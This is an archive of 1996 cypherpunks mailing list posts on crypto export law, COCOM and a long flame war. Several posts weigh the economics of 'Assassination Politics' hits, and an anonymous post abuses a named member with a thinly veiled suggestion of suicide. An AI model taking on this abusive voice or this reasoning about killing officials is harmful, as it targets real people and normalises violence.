From pgf at acadian.net Sun Sep 22 00:16:35 1996 From: pgf at acadian.net (Phil Fraering) Date: Sun, 22 Sep 1996 15:16:35 +0800 Subject: USA_exe (Kiddie porn on the Internet) In-Reply-To: <199609220023.AAA29950@pipe4.ny3.usa.pipeline.com> Message-ID: If you think the Mexican government would sit still while whatever the rebels are called this week escalated their violence, you'd be crazy. With the sort of stuff being suggested, the retaliation wouldn't just get SubCommander Marcos, but the whole submarine and the rest of the fleet ;-). Vulnerability works both ways. Phil Fraering "And the moral of the story is, pgf at acadian.net *never count your boobies until they 318/261-9649 are hatched*." - James Thurber, "The Unicorn in the Garden" From jimbell at pacifier.com Sun Sep 22 00:38:14 1996 From: jimbell at pacifier.com (jim bell) Date: Sun, 22 Sep 1996 15:38:14 +0800 Subject: Bernstein hearing: The Press Release Message-ID: <199609220525.WAA21842@mail.pacifier.com> At 11:30 PM 9/21/96 -0400, Mark M. wrote: >On Sat, 21 Sep 1996, jim bell wrote: > >> At the risk of being a devil's advocate, let me suggest that you are >> conceding too much even with the preceding paragraph. The 1st amendment >> says nothing about preventing speech which (even admittedly) would result >> in "direct, immediate, and irreparable damage to our nation or its people." > >I believe there is one section in the Constitution that says that speech >harmful to national security is not protected under the 1st amendment. I can't think of what portion of the Constitution you're referring to. But chances are, somebody else will see this reference and comment. > However, >I don't agree with this provision at all. "National security" is a phrase that >is applied to anything from information on the JFK assassination to DES source >code. ...and it's one of the most abused concepts there is. >> I could list many more, but won't because of lack of space. 
But notice >> that, presumably, each and every one of these incidents was AT ONE TIME kept >> secret, arguably because it would be better for the country to do so. Thus, >> presumably it was thought or at least asserted that to reveal them would >> cause "damage to our nation or its people." > >If secret information was released, it would cause most people to completely >lose respect for the government (some people call this damage -- I call it >progress). Yes! I, of course, agree with the latter interpretation as well. It is precisely this distinction which, I believe, makes it so vital that lawsuits such as this Bernstein one NOT "concede" what doesn't need to be conceded. All they should say is that even if there are secrets which the law should protect, they cannot include information known by civilians in peacetime. >> The way you've written the paragraph I've quoted above, it appears that you >> are somehow acknowleding that there are certain circumstances where certain >> types of speech are controllable because they are "harmful," but you fail to >> explain how even this constitutional restiction is tolerable. Frankly, I >> don't see it! What you need to do is to be far more specific about such >> speech and exactly where it can be controlled. > >There may be certain circumstances under which speech can be directly harmful. >Military operations and missle launch codes are things that should be kept >secret. Information about high-powered weapons should be too. If the Japanese >had been able to get information about how to build A-bombs during WWII, major >cities in the U.S. probably would have been completely wiped out. I don't like >the idea that the government has the power to decide what's harmful and what >isn't, but there are beneficial uses of the provision. The few examples that exist, as you've selected them above, seem to be almost entirely based on military secrets in time of war. 
It is not clear whether a non-security clearance civilian is restricted in any way, nor should he be. Jim Bell jimbell at pacifier.com From dlv at bwalk.dm.com Sun Sep 22 00:42:05 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 22 Sep 1996 15:42:05 +0800 Subject: Continuing spam from Timmy May and his friends Message-ID: I recently sent the following article to this mailing list: ]To: cypherpunks at toad.com ]Subject: Re: DL in exchange for fingerprint ]From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) ]Comments: Dole/Kemp '96! ]Message-Id: ]Date: Sat, 21 Sep 96 08:00:57 EDT ]In-Reply-To: ]Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y. ] ]Black Unicorn writes: ]> > Do you simply drive without a valid driver's license? I know some folks who ]> > do, of course, but it's not something that's "worth it" to me. ]> ]> Some jurisdictions (D.C. is a good example) are such a joke it's not ]> funny. An associate of mine literally MADE his own Italian Driver's ]> license and turned it in, took an eye test, and walked out with a nice new ]> D.C. license. ] ]In NYC a very high percentage of drivers don't have licences, have suspended ]licences, etc. Generally no one has the time to bother with them unless they ]want to nail them for something else. A couple of years ago we were involved in ]a minor car accident with a Chassidic Jew who tried to leave the scene of the ]accident. My wife chased him and stopped him. :-) The cops came and discovered ]that he had no papers (including no driver's licence, no insurance, etc). They ]gave him about $500 worth of tickets for driving without a licence, leaving the ]scene of an accident, etc (which I rather doubt he was planning to pay) and let ]him drive on (still without the licence). 
]
]---
]
]Dr.Dimitri Vulis KOTM
]Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

I received the following e-mail from either Timmy May using an alternate account, or someone whose IQ is similar to Timmy's, in response:

]From Adamsc at io-online.com Sat Sep 21 22:40:36 1996
]From: Adamsc at io-online.com (Adamsc)
]To: "Dr.Dimitri Vulis KOTM"
]Date: Sat, 21 Sep 96 19:40:29 -0800
]Reply-To: "Chris Adams"
]X-Mailer: Chris Adams's Registered PMMail 1.52 For OS/2
]X-Filtered: By PMMail 1.52 For OS/2
]Mime-Version: 1.0
]Content-Type: text/plain; charset="us-ascii"
]Content-Transfer-Encoding: 7bit
]Subject: Re: Re: DL in exchange for fingerprint
]Message-Id: <19960922023957609.AAA206 at GIGANTE>
]
] You are being gently flamed because.
]
] [X] you continued a boring useless stupid thread
] [ ] you repeatedly posted to the same thread that you just posted to
] [x] you repeatedly initiated incoherent, flaky, and mindless threads
] [x] you posted a piece riddled with profanities
] [ ] you advocated Net censorship
] [ ] you SCREAMED! (used all caps)
] [x] you posted some sort of crap that doesn't belong in this group
] [ ] you posted the inanely stupid 'Make Money Fast' article
] [ ] you threatened others with physical harm
] [x] you made a bigoted statement(s)
] [x] you repeatedly assumed unwarranted moral or intellectual superiority
] [x] you are under the misapprehension that this group is your preserve
] [x] you repeatedly shown lack of humor
] [x] you are apparently under compulsion to post to every threat
] [?] you are posting an anonymous attack
]
] >>> Thank you for the time you have taken to read this. Live n' Learn.<<<
]
]
]
]# Chris Adams | http://www.io-online.com/adamsc/adamsc.htp
]# cadams at acucobol.com | V.M. (619)515-4894
]"I have never been able to figure out why anyone would want to play games on
]a computer in any case when the whole system is a game. Word processing,
]spreadsheets, telecoms -- it's all a game.
And they pay you to play it." ] -- Duncan Frissell ] ] Just now I received about 2 dozen similar e-mails from this address, which therefore must be Timmy May's - I can't believe that there are two people on the 'net this stupid and obnoxious and prone to lying. In particular, I receive this spam from Timmy in response to each 'crypto-relevant wire clippings' post. Timmy May is definitely turning this mailing list into a political rant menagerie where cryptography discussions are not welcome. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From wombat at mcfeely.bsfs.org Sun Sep 22 01:02:42 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Sun, 22 Sep 1996 16:02:42 +0800 Subject: timmy waxes a widdle on AP In-Reply-To: <199609211946.MAA27996@dns2.noc.best.net> Message-ID: On Sat, 21 Sep 1996, James A. Donald wrote: > At 08:11 PM 9/17/96 -0700, Vladimir Z. Nuri wrote: > > but I'm still a bit confused about those prices. what determines > > them, anyway? risk to the assassin? it seems that it ought to be > > as easy to snuff out one person as it would another. e.g. everybody > > walks alone out at night at different times, it seems. > > Although government services to the rich and poor cost about > the same, the quality is radically different. Thus the risk > involved in killing a poor person is vastly less than the > risk involved in killing a middle class person. > I think it is more likely an us-vs.-them mentality, rather than the cost of educating the person in question. If someone much poorer than you is killed in a poor neighborhood, you don't feel as threatened - it is one of "them" - If someone of equal or greater socio-economic background suffers a violent death, you begin to think "it could happen to me, too." Now it is a matter of "us." The higher up the scale you go, the more people on the "us" side of the coin, with more money/political clout as well. 
This increases the demand to apprehend the killer, which increases the risk to the killer, hence, a higher price for a hit on a target in a higher socio-economic position. It is not unusual for the investigation of drug-related murders to be lax; the "tax-paying" majority often says "let them bump each other off." With lax enforcement, lack of public outcry, there's less risk. The price is lower. Now if it is the lawyer that lives just down the street ... Ooops. Bad choice of profession. :) Bad wombat. No biscuit. g'nite, all. From wombat at mcfeely.bsfs.org Sun Sep 22 01:10:37 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Sun, 22 Sep 1996 16:10:37 +0800 Subject: Assassination Politics, was Kiddie porn on the Internet In-Reply-To: <199609212321.QAA07036@mail.pacifier.com> Message-ID: On Sat, 21 Sep 1996, jim bell wrote: > At 01:51 PM 9/17/96 -0700, Steve Schear wrote: > >>On Mon, 16 Sep 1996, Steve Schear wrote: > >> > >>> Someone wrote: > >>> We've all heard these arguments, but are they true? Who says so, and how > >>> can they be certain? Jim's suggestion has never, to my knowledge, been > >>> tried on a consistant, large, scale. When all conventional alternatives > >>> have been tried and fail, what have we or the starving children got to > >>> lose? > >> > >>I think "Lord of the Flies" answers this question quite well. > > > >Does it? LOTF was fiction. Can you identify a recent instance in which a > >non-governmental organization attempted to influence political/military > >events via a concerted AP? > Where is Jimmy Hoffa? From proff at suburbia.net Sun Sep 22 01:35:06 1996 From: proff at suburbia.net (Julian Assange) Date: Sun, 22 Sep 1996 16:35:06 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: <199609220525.WAA21842@mail.pacifier.com> Message-ID: <199609220647.QAA13187@suburbia.net> > >There may be certain circumstances under which speech can be directly harmful. 
> >Military operations and missle launch codes are things that should be kept > >secret. Information about high-powered weapons should be too. If the > Japanese > >had been able to get information about how to build A-bombs during WWII, major > >cities in the U.S. probably would have been completely wiped out. I don't > like > >the idea that the government has the power to decide what's harmful and what > >isn't, but there are beneficial uses of the provision. > > The few examples that exist, as you've selected them above, seem to be > almost entirely based on military secrets in time of war. It is not clear > whether a non-security clearance civilian is restricted in any way, nor > should he be. You must remember there is a distinction to information in-confidence, and information generated independntly. It is only the breech of confidence that should be penalised, not the information itself. -- "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies, The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S. 
Lewis, _God in the Dock_ +---------------------+--------------------+----------------------------------+ |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | |proff at suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | |proff at gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 | +---------------------+--------------------+----------------------------------+ From proff at suburbia.net Sun Sep 22 01:53:11 1996 From: proff at suburbia.net (Julian Assange) Date: Sun, 22 Sep 1996 16:53:11 +0800 Subject: LACC: Re: Australia now has information police In-Reply-To: Message-ID: <199609220643.QAA13076@suburbia.net> > > > Hello: > > I have one short, short question regarding this item. I really > hope that you know the anwswer and have the time to answer it. > > 1- International document: any idea who else had signed it? [re COCOM trade agreements] All COCOM countries most likely. That said Australia does not seem to be actively enforcing this relic of the cold war. However around 8 years ago, I recall that the NSA found out about a telephone encrypting device developed here in Australia, and preassured the Australian government to forbid export of the device, under COCOM provisions until it was weakened. At the moment it is politically untenable to enforce COCOM export provisions over cryptographic software in this country. The COCOM treaty is seen, quite rightly, as a U.S barrow which COCOM countries had to sign in order to avoid U.S trade sanctions and tarrifs, but not something that needs to be enforced for smaller concerns (arms shipments are bigger concerns). COCOM is being replaced with new controls, according to the PARI DAILY. (anyone have better details?) 
PARI DAILY FRIDAY, APRIL 5, 1996 BULGARIA IGNORED AT POST-COCOM TALKS Bulgaria did not take part in the first plenary session of the member-countries of the Wassenaar Arrangement, also known as the New Forum, Foreign Ministry spokesman Mr.Pantelei Karasimeonov told a briefing yesterday. Of all the 28 participants in the session, it was only USA that opposed Bulgaria's participation in the arrangement, a control regime which is to succeed the Cold War's COCOM export controls of technology and equipment usable for military purposes, too, it was revealed at the briefing. Bulgaria has stated many times, and at different levels, its willingness to join the new control regime, the Foreign Ministry spokesman emphasised. In a statement, disseminated by BTA, Bulgarian News Agency, Foreign Ministry pointed out that obviously some of the participants in the Wassenaar Arrangement talks are still under the rather depressing impressions of the suitable conditions created in the country for wide-ranging scot-free ruin and lack of ownership, which apply also to the military-industrial complex and foreign trade in spesial-purpose production. Mr. Karasimeonov said that these impressions have sprung from the period of radical economic and political reforms in the country; he voiced his hopes that the founder-states of the Wassenaar Arrangement would soon change these views of theirs and would put their trust in Bulgaria's export control abilities. Trade Ministry officials said that bilateral talks are due to be held between Bulgaria and each of the New Forum member-countries, which are expected to result in Bulgaria's joining the arrangement. An expert group is to visit USA from April 29 till May 3 aiming to acquaint American high officials with the measures Bulgaria has taken to control trade in spesial-purpose production, Mr.Vladimir Velichkov, head of Internationally Controlled Trade Department at Trade Ministry, said in a recent interview for the PARI Daily. 
By June an expert group of the Wassenaar Arrangement is due to visit Bulgaria to lead discussions about our participation in the New Forum. -- "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies, The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S. Lewis, _God in the Dock_ +---------------------+--------------------+----------------------------------+ |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | |proff at suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | |proff at gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 | +---------------------+--------------------+----------------------------------+ From stewarts at ix.netcom.com Sun Sep 22 02:16:09 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 22 Sep 1996 17:16:09 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] Message-ID: <199609220708.AAA20288@dfw-ix2.ix.netcom.com> At 01:34 PM 9/21/96 -0400, Phill wrote: >[AP drivel deleted] >If it could the US would have assasinated Saddam by now. It can't because it >is too difficult to find out where exactly a person will be. It's perfectly doable, it's just not politically expedient. One reason is that if they kill Saddam, they no longer have an excuse to keep threatening and attacking Iraq and making themselves look good. Another is that National Leaders have a tacit understanding between themselves never to assassinate other politicians [well, hardly ever....] 
If you break the taboo, you're implicitly inviting everyone else to go gunning for you, and it's too easy to do if there are enough people who really want you dead, especially well-organized people like a foreign army or spy service. If the US _had_ really wanted to assassinate Saddam, they could have hired professionals to do the job (like Mossad.) Instead they killed 200,000 other Iraqis, including civilians, draftees, and a few tens of thousands of real soldiers. >In addition *ANYONE* who attempted to implement AP would be someone *I* >would regard as a tyrant and therefore a legitimate target by the rules Yup. >I think that this type of talk is incredibly dangerous. There are plenty of >people on the net who are psychos and if you spread AP drivel arround someone >is going to act on it. I think a more realistic danger is that the government will use it as an excuse to attack all the techniques for private communications that cypherpunks have been suggesting will make AP possible. >PS it is not censorship to stop people from advocating murder. Nonsense. It certainly _is_ censorship, and it's hypocrisy to suggest otherwise. You can argue whether it's _justified_ censorship, just like the AP advocates argue whether assassination is justified murder, but censorship it is. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From dlv at bwalk.dm.com Sun Sep 22 02:19:41 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 22 Sep 1996 17:19:41 +0800 Subject: timmy waxes a widdle on AP In-Reply-To: Message-ID: Rabid Wombat writes: > I think it is more likely an us-vs.-them mentality, rather than the cost > of educating the person in question. 
If someone much poorer than you is
> killed in a poor neighborhood, you don't feel as threatened - it is one
> of "them" - If someone of equal or greater socio-economic background
> suffers a violent death, you begin to think "it could happen to me, too."

I was reading the other day about the lessons learned from the one-time tax refund in 1975. Most consumers realized that this is a one-time deal and saved most of it, rather than spent it. On the other hand, after Reagan's tax cuts the consumers spent much of their newly retained income because they believed that the lower tax rate would continue for a few years.

Likewise once an occasional gubment official in Mexico is assassinated often enough for the population to perceive public service as being a hazardous profession, they'll have trouble recruiting the replacements. Assassinations won't work as long as they're perceived by the public as zero-probability events. The public perception depends on other factors besides the numbers or the frequency of the hits.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From attila at primenet.com Sun Sep 22 02:32:29 1996
From: attila at primenet.com (attila)
Date: Sun, 22 Sep 1996 17:32:29 +0800
Subject: Chris Adams clever frame ...er, flame
In-Reply-To: <19960922023806125.AAA206@GIGANTE>
Message-ID: <199609220739.BAA27973@InfoWest.COM>

In <19960922023806125.AAA206 at GIGANTE>, on 09/21/96 at 07:38 PM, Adamsc at io-online.com (Adamsc) said:

> You are being gently flamed because.

well, I look at creative writing in a different light:

a) sarcasm is always in season
b) Dr. Dimitri is always an excellent target
c) if I had $10 for each sarcastic eoast in CP over the last 3 years I could retire in the style of tcmay, rather than the restrained mode I am retired.
d) is there ever any dicussion on CP which does not flame out?
e) your 'gentle flame' is a great idea.
is it copyrighted
f) CP charter was violated so often in last few years that I, and several others started a splinter for code only. if you can't handle the fun, sign off...
g) CP's charm is its personalities

last, but least:

h) join the humour, or... well, lighten-up.

> [X] you continued a boring useless stupid thread

see item a) above

> [x] you repeatedly initiated incoherent, flaky, and mindless threads

et tu. brute?

> [x] you posted a piece riddled with profanities

I beg to differ with you! since when is allusion or illusion profane?

> [x] you posted some sort of crap that doesn't belong in this group]

see a) above, *again*

> [x] you made a bigoted statement(s)

hmmm, not on this one. besides, since when have we advocated PC speech

> [x] you repeatedly assumed unwarranted moral or intellectual superiority

I stand far back in the line for honours on that one --maybe in 2002?

> [x] you are under the misapprehension that this group is your preserve

yes! absolutely! but, I share it with 1000+ others

> [x] you repeatedly shown lack of humor

one man's "plum" is another man's "prune"

> [x] you are apparently under compulsion to post to every threat

wrong! I trash 75% before opening!

> [?] you are posting an anonymous attack

check the spook records listed under "Ace of Swords"

> >>> Thank you for the time you have taken to read this. Live n' Learn.<<<

your pleasure is my pleasure.

--
"He said, `You are as constant as a northern star,' and I said, `Constantly in the darkness ? Where's that at ?'" --Joni Mitchell

From stewarts at ix.netcom.com Sun Sep 22 02:46:24 1996
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sun, 22 Sep 1996 17:46:24 +0800
Subject: Bernstein hearing: The Press Release
Message-ID: <199609220730.AAA20792@dfw-ix2.ix.netcom.com>

At 10:24 PM 9/21/96 -0800, Jim Bell wrote:
>At 11:30 PM 9/21/96 -0400, Mark M. wrote:
>>I believe there is one section in the Constitution that says that speech
>>harmful to national security is not protected under the 1st amendment.
>I can't think of what portion of the Constitution you're referring to. But >chances are, somebody else will see this reference and comment. The First Amendment does not contain the phrase "national security" anywhere in it. It does, however, begin with a rather explicit "Congress shall make no law" which it applies to a bunch of things. However, the body of the Constitution does say there should be a Supreme Court, and the Supreme Court has (fairly reasonably) given itself the job of deciding what's Constitutional and what's not. The Supremes have, over the years, made a bunch of generally outrageous decisions about what kinds of speech are protected by the First Amendment and what kinds aren't, though their opinions have been gradually improving since some of the really appalling ones earlier in the century. By the way, alt.federal.judge.bork.bork.bork has recently come out with a book in which he discusses issues like censorship. He's in favor of it. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From dthorn at gte.net Sun Sep 22 03:43:36 1996 From: dthorn at gte.net (Dale Thorn) Date: Sun, 22 Sep 1996 18:43:36 +0800 Subject: Going AP Shit on the Internet In-Reply-To: <3.0b16.32.19960921222547.00e3e3e0@www.ctrl-alt-del.com> Message-ID: <3244F383.4743@gte.net> Black Art wrote: > At 06:22 PM 9/21/96 -0700, Dale Thorn wrote: > >[more examples of "why it wouldn't work" deleted] > >This is like Buliosi hyping his superior strategy all over TV (at > >least > >he had the decency to say the jury was basically honest). It's still > >strategy, folks. It doesn't say anything about the people's right to > >have more control over what is already happening. I just wish > >entities like Black Art would say "I'm doing all I possibly can to > >make sure the people DO get involved when govt. *decides* to murder > >someone". 
Then, entities like Black Art wouldn't be able to stand > >back in their righteousness and say that they're NOT responsible for > >what their govts. do. > What do you mean "when"? Government murders people all the time. As > for when you will find out about it... Most of the time, you will > not. Governments have gotten very good at hiding their crimes. Either > by orders of secrecy, appeals to patriotism, or doing it out of view > of the general public. > I realize my limitations in taking on an enitity as large as Uncle > Sugar. I do what I can to foil his plans (which is not much), but I do > not believe for a moment that he actually listens to the cries of the > peasants unless he wants to. Government is like a servant. He > wanders about your house at > all hours. Sneeks up on you when you are not looking. And will slip > something nasty into your drink if you become too much of a pain and > beleive that they will benifit by your death. > Governments are groups of individuals. Since they are not me, I have > no responsibility over their actions. (Any more than I have over > yours.) > Are you responsible for what your government does? Can we hold you > accountable for them? Punish you for those crimes? > I didn't think so. I'm hearing even more strategy, it would seem. I don't see the relevance of how govt. behaves (i.e., like a bad uncle who hangs around too long and molests the kids, etc.) to who's responsible. If you live in the U.S., that govt. is your agent, carrying out your representatives' instructions, and paid with your tax dollars. Unless and until this becomes a literal dictatorship (and there is a valid argument that it applies even then), you are responsible for whatever your paid agents do, from the street cop to the top politico. It's too bad your fellow citizens shirk their duty and watch TV instead, but issuing the above kinds of denial doesn't take the blood off of your hands or mine. 
Now maybe it would take God (for example) to judge whether you, I, or Joe Blow is more guilty, for lack of participation or some other citizen crime, but you can't put all the blame on your hired agents for their crimes, when you know very well what kinds of things they do, and you continue to fund them. You have to be considered an accessory, at least. From nobody at cypherpunks.ca Sun Sep 22 03:46:19 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Sun, 22 Sep 1996 18:46:19 +0800 Subject: A daily word of caution regarding Tim C[ocksucker] May Message-ID: <199609220838.BAA25391@abraham.cs.berkeley.edu> `A pen is mightier than a sword', not to mention Tim C[ocksucker] May's pea-sized penis. He would be better served by a safety razor, possibly applied in a bathtub filled with warm water (something he has surely never been into). From whgiii at amaranth.com Sun Sep 22 03:53:18 1996 From: whgiii at amaranth.com (William H. Geiger III) Date: Sun, 22 Sep 1996 18:53:18 +0800 Subject: Snake-Oil FAQ In-Reply-To: Message-ID: <199609220854.DAA27487@mailhub.amaranth.com> In , on 09/21/96 at 04:47 PM, Lance Cottrell said: >I am setting up just such a list. I plan to award products for both >excellent and lousy crypto. This really should be a committee (yuch) >effort, so if you would like to participate, please let me know. I would be intrested in this. I would like to see the following information made available for any product that made it on to the list: Detailed listings of pro/cons of the product. Contact with the authors & listing of any rebutials they may have for the cons. A appendix to the list explaining why the individule points are a pro or a con for crypto products. -- ----------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting WebExplorer & Java Enhanced!!! 
Merlin Beta Test Site - WarpServer SMP Test Site Author of PGPMR2 - PGP Front End for MR/2 Ice Look for MR/2 Tips & Rexx Scripts Get Work Place Shell for Windows!! PGP & MR/2 the only way for secure e-mail. Finger whgiii at amaranth.com for PGP Key and other info ----------------------------------------------------------- From whgiii at amaranth.com Sun Sep 22 06:06:14 1996 From: whgiii at amaranth.com (William H. Geiger III) Date: Sun, 22 Sep 1996 21:06:14 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: <199609220708.AAA20288@dfw-ix2.ix.netcom.com> Message-ID: <199609221056.FAA27889@mailhub.amaranth.com> In <199609220708.AAA20288 at dfw-ix2.ix.netcom.com>, on 09/22/96 at 12:09 AM, Bill Stewart said: >>If it could the US would have assasinated Saddam by now. It can't because it >>is too difficult to find out where exactly a person will be. >It's perfectly doable, it's just not politically expedient. >One reason is that if they kill Saddam, they no longer have an >excuse to keep threatening and attacking Iraq and making themselves look good. >Another is that National Leaders have a tacit understanding between themselves never >to assassinate other politicians [well, hardly ever....] If you break the taboo, >you're implicitly inviting everyone else >to go gunning for you, and it's too easy to do if there are enough >people who really want you dead, especially well-organized people >like a foreign army or spy service. >If the US _had_ really wanted to assassinate Saddam, they could have >hired professionals to do the job (like Mossad.) Instead they >killed 200,000 other Iraqis, including civilians, draftees, and a >few tens of thousands of real soldiers. You need to take into account the politics of the region. With Saddam gone you have created a power vaccume that Iran would be all to happy to fill. It was for this reason that durring the Gulf War the US & its allias (European & Arab) did not go to Bagdad. 
They mearly wanted to knock Saddam down a notch or two not take him out. I will agree with you about the taboo on political assassinations. Even the Mossad are not involved in assassination of government leaders (they keep such actions to rather nasty terrorist). The assassinations of government leaders that have taken place in the region have all been from citizens of their own country. -- ----------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting WebExplorer & Java Enhanced!!! Merlin Beta Test Site - WarpServer SMP Test Site Author of PGPMR2 - PGP Front End for MR/2 Ice Look for MR/2 Tips & Rexx Scripts Get Work Place Shell for Windows!! PGP & MR/2 the only way for secure e-mail. Finger whgiii at amaranth.com for PGP Key and other info ----------------------------------------------------------- From aba at dcs.ex.ac.uk Sun Sep 22 06:29:28 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Sun, 22 Sep 1996 21:29:28 +0800 Subject: Timmy May's spam (Was: Re: CIA hacked) In-Reply-To: Message-ID: <199609220707.IAA00335@server.test.net> Dimitri Vulis writes: > You're right - the forwarding mechanism I've been using so far just yanks in > the spam e-mail without any processing. I will henceforth > 1) Put the words 'Tim', 'May', and 'spam' in the subject line Guess that will help people kill file on that combination, rather than on dlv at bwalk, which I suspect some may have done at this stage, and hence not see the [NEWS] series, and any signal posts. > > It would seem to me that the first insults were thrown by yourself, > > and that your strange habit of bouncing all the fallout to the list is > > perpetuating the problem. > > No. Let me remind you the sequence of events, in chronological order: > > 1. 
Timmy May (who picked up a few popular PKC buzzwords, doesn't know > anything about crypto, and isn't interested in learning) started spamming > this mailing list with political rants I don't think this at all fair; if you've read his cyphernomicon, you will see that he has a perfectly good understanding of crypto. His strong point as I see it however, is that he was one of the first to think deeply about the implications of strong crypto, and document this in a fairly comprehensive manner. This is a central topic for cypherpunks, after all: cypherpunks are trying to achieve poltical ends via strong crypto, crypto isn't being discussed in isolation, as a purely scientific endeavour. sci.crypt with its charter is more this. Also, I would point out that you yourself don't restrict yourself to purely crypto discussions (aside from this latest war), you for instance recently discussed driving licenses in NY. Not that I am complaining, or think this is especially inappropriate, as the topic of Chaumian credentials, and the current state of state mandated credentials I consider on topic, but you are criticizing others for analysing politics. The [NEWS] series, also (I've already said I consider these useful), are hardly pure discussion of crypto, if this were your only concern. > 2. Most people who used to discuss crypto work on this mailing list > have unsubscribed. True, and unfortunate. coderpunks feels somewhat reminiscent of how cypherpunks used to be in this regard, try subscribing to that, if you are uninterested in political aspects, and have not already. I subscribe to both, because I think politics is also important, as well as churning out code, and just read very selectively on cypherpunks. > 3. I pointed out a few examples of Tim making factually bogus claims in > his rants. > > 4. Tim got very angry at me and started flaming me. I ignored him. > > 5. Tim posted a series of rants about me, attributing to me various > nonsense I never said. 
I pointed out once that I never said it and > then ignored him. I wasn't paying attention when these alleged events took place, so I can't really comment. I was commenting more on the fallout. > 6. Recently it came to my attention that Tim's been contacting off-list > various people in the computer security field and "complaining" about > the politically incorrect things that I supposedly say on the Internet > - except that he made up most of the "things" he complained about. I don't think it's near as serious as you are worrying about, all I heard him say was something about not understanding the motive for the (spit) stuff. Hardly complaining, more a passing comment on your posting style than a complaint of "political incorrectness". > 7. At this point I pointed out quite publicly that he's a liar. > > 8. Since that time, several friends of Tim May (or maybe Tim himself, > using multiple accounts) have been sending me harrassing e-mail, often > by quoting my own cypherpunks articles and adding an obscenity. It appears that Chris Adams started this. And others confused by the quoting, presumed it was you. (Especially since the headers were yours, as you were forwarding them.) Also the fact that you were forwarding these emails probably would get you complaints anyway, even if the quoting had made it clear what was going on. > 9. Tim himself continues flaming me and telling lies about me (see his > recent rant with the subject "death threats"). I guess you mean the purely fictitious Valdimir G Nulis :-) A cross between Vladimir Z Nuri (who many consider to be Detweiller) and yourself. I don't really see what you're complaining about: it's really oblique, and tame compared to your recent perfectly direct, and somewhat crude insults to Tim. > And you see, Timmy May is an obsessive liar and a vindictive nutcase. I don't see the liar, nor the nutcase. I haven't noticed him say anything which I considered untrue, nor have any of his posts appeared nutty. 
> > If reporting to the list is accurate, I hear you have a PhD with a > > subject related to crypto, so presumably you would have ample > > knowledge to contribute technical crypto related thoughts. I'm sure > > people would be interested in anything along those lines you cared to > > contribute, and your reputation would benefit, > > I still hope to be able discuss crypto on this mailing list (yes, my Ph.D. > thesis was about crypto), but I see two problems: > > 1. A lot of people have already left this list, unwilling to be subjected > to Tim May's rants, lies, and personal attacks. If I post something crypto- > relevant to this mailing list, they won't see it. The decision to keep the list open was made for reasons I agree with, censoring people is not the way to promote open discussions. Censoring people is something cypherpunks are strongly against in other forums, so it would seem especially hypocritical for cypherpunks to censor the list itself. However the result isn't too pretty either. But the only solution is to just post signal. Getting into what is turning into a spam bot war doesn't solve a thing! > 2. Here's an example of the net-abuse being perpetrated by Tim May and his > merry gang of mailbombers. I posted some crypto-relevant wire clippings > to this mailing list. Either Tim (using an alternate account) or some pal > of his e-mailed it back to me with an obscenity appended. > > ]From adamsc at io-online.com Thu Sep 19 00:00:57 1996 ^^^^^^^^^^^^^^^^^^^^ why is this in part of your own headers? > ]Received: by bwalk.dm.com (1.65/waf) > ] via UUCP; Thu, 19 Sep 96 00:49:21 EDT > ]From: Troy Varange and this too? Is this as a result of threading, or are you quoting part of another message? Or is it a forgery? > ]Subject: Re: [NEWS] Crypto-relevant wire clippings > ]> [...] > ]> CIA-backed rebels in Nicaragua played in bringing crack cocaine and > ]> weapons to Los Angeles and other cities. 
